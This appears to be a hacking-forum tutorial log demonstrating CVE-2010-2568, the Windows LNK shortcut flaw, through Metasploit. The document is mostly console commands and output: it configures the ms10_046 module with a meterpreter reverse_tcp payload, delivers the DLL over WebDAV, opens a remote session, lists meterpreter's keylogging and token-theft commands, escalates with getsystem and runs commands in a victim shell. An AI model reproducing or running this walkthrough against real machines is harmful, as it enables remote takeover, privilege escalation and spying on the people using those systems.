Exploit:
CVE-2010-2568
Windows 0day remote code execution
OS vulnerabili:
* Windows XP Service Pack 3
* Windows XP Professional x64 Edition Service Pack 2
* Windows Server 2003 Service Pack 2
* Windows Server 2003 x64 Edition Service Pack 2
* Windows Server 2003 with SP2 for Itanium-based Systems
* Windows Vista Service Pack 1 and Windows Vista Service Pack 2
* Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
* Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
* Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
* Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
* Windows 7 for 32-bit Systems
* Windows 7 for x64-based Systems
* Windows Server 2008 R2 for x64-based Systems
* Windows Server 2008 R2 for Itanium-based SystemsVideo:
Log:
faber@F4B3X:~$ cd msf3
faber@F4B3X:~/msf3$ sudo ./msfconsole
[sudo] password for faber:
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 596 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10551 updated today (2010.10.05)
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SVRHOST 192.168.0.2
SVRHOST => 192.168.0.2
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:4444
[*]
[*] Send vulnerable clients to \\192.168.0.2\fontnK\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.2:80/
[*] Server started.
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Sending UNC redirect to 192.168.0.2:37247 ...
[*] Sending UNC redirect to 192.168.0.2:37248 ...
[*] Responding to WebDAV OPTIONS request from 192.168.0.2:37258
[*] Responding to WebDAV OPTIONS request from 192.168.0.2:37259
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/desktop.ini
[*] Sending 404 for /fontnK/desktop.ini ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Sending LNK file to 192.168.0.2:37259 ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.manifest
[*] Sending 404 for /fontnK/ZoGR.dll.manifest ...
[*] Sending DLL payload 192.168.0.2:37259 ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.123.Manifest
[*] Sending 404 for /fontnK/ZoGR.dll.123.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.124.Manifest
[*] Sending 404 for /fontnK/ZoGR.dll.124.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/ZoGR.dll.2.Manifest
[*] Sending 404 for /fontnK/ZoGR.dll.2.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK
[*] Sending 301 for /fontnK ...
[*] Received WebDAV PROPFIND request from 192.168.0.2:37259 /fontnK/
[*] Sending directory multistatus for /fontnK/ ...
[*] Sending stage (748544 bytes) to 192.168.0.2
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49906) at Tue Oct 05 17:47:03 +0200 2010
sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 L1ghtman-PC\L1ghtman @ L1GHTMAN-PC 192.168.0.2:4444 -> 192.168.0.2:49906
msf exploit(ms10_046_shortcut_icon_dllloader) >
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
k**scan_dump Dump the k**stroke buffer
k**scan_start Start capturing k**strokes
k**scan_stop Stop capturing k**strokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 4).
meterpreter > shell
Process 3164 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
l1ghtman-pc\l1ghtman
C:\Windows\system32>cd C:\
cd C:\
C:\>dir
dir
Volume in drive C has no label.
Volume s*r*a* Number is BC7B-7397
Directory of C:\
10/06/2009 23:42 24 autoexec.bat
10/06/2009 23:42 10 config.sys
14/07/2009 04:37 <DIR> PerfLogs
05/10/2010 17:27 <DIR> Program Files
05/10/2010 15:53 <DIR> Users
05/10/2010 17:30 <DIR> Windows
2 File(s) 34 bytes
4 Dir(s) 14.520.733.696 bytes free
C:\>makedir
makedir
'makedir' is not recognized as an internal or external command,
operable program or batch file.
C:\>taskkill /IM notepad.exe
taskkill /IM notepad.exe
SUCCESS: Sent termination signal to the process "notepad.exe" with PID 3656.
C:\>taskmgr
taskmgr
C:\>Thanks To ClsHack.it [url=http://www.realtanascosta.it]www.realtanascosta.it[/url] [url=http://www.netw0rksecurity.net]www.netw0rksecurity.net[/url] ||| L1ghtman
[*] Meterpreter session 1 closed. Reason: Died
Tut by ClsHack
Video by L1ghtman
Thanks to: ClsHack.it , Netw0rkSecurity.net & RealtaNascosta.it
Ricordati di leggere il regolamento! ; D